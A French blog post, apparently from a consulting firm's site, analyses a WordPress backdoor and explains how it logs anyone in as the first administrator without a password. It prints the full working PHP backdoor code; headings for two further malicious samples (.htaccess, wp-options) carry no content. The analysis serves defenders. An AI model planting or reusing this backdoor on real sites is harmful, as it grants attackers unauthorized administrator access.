code Zoba : pirate wordpress détecter

Ce code pose plusieurs problèmes de sécurité graves et n’est pas du tout recommandable.

Principaux problèmes :

1. Backdoor / porte dérobée

Ce code permet de se connecter automatiquement comme administrateur sans mot de passe. Il s’agit d’un script malveillant typique de piratage.

2. Contournement complet de l’authentification

php
wp_set_auth_cookie( $results[0] ); // Connecte sans vérifier les identifiants

3. Utilisation dangereuse de @chdir()

Le @ supprime les erreurs, ce qui rend le débogage impossible.

4. Absence de vérification d’accès

N’importe qui exécutant ce fichier devient automatiquement admin.

Ce que fait réellement ce code :

  1. Cherche l’installation WordPress

  2. Récupère le premier administrateur

  3. Se connecte automatiquement comme cet admin

  4. Redirige vers l’admin panel

Conclusion :

Non, ce n’est PAS un bon code. C’est un script malveillant (backdoor) qui :

  • Permet un accès non autorisé

  • Contourne toutes les mesures de sécurité

  • Pourrait être utilisé pour pirater un site WordPress

Exemple de ce code

_______________________________________________________________
<?php
$mr=$_SERVER[‘DOCUMENT_ROOT’];
@chdir($mr);
if (file_exists(‘wp-load.php’)){
include ‘wp-load.php’;
$wp_user_query = new WP_User_Query( array( ‘role’ => ‘Administrator’, ‘number’ => 1, ‘fields’ => ‘ID’ ) );
$results= $wp_user_query->get_results();
if ( isset( $results[0] ) ) {
wp_set_auth_cookie( $results[0] );
wp_redirect( admin_url() );
die();
}
die( ‘NO ADMIN’ );
}
else{
die(‘Failed to load’);
}
?>

Deuxième code malvaillant sur le htaccess

______________________________________________________

Troisième code malveillant sur wp-options

Illustration de l’attaque sur le site victime

Partager

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

C'est maintenant faciliter vous la vie

Profitez de réductions jusqu’à 15% et d’autres avantages exclusifs en tant qu’abonné Facility Consulting. Nos promotions sont communiquées chaque mois

© 2024 Created with Facility consulting

×